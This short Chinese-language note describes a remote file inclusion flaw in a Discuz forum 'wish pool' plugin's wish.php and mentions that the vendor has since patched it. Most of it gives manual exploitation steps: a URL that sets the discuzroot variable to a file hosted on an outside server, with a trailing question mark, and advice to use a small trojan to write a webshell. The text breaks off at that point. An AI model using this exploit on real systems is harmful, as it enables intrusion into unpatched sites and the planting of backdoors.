discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuzroot.'./include/discuzcode.func.php'; discuz bbs 目前客方已修正了此漏洞,请下载最新版本 手工利用方法: 远程包含漏洞,变量discuzroot过滤不严,利用方法: http://url/wish.php?discuzroot=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用CN.Tink的那个小马写个shell进去:...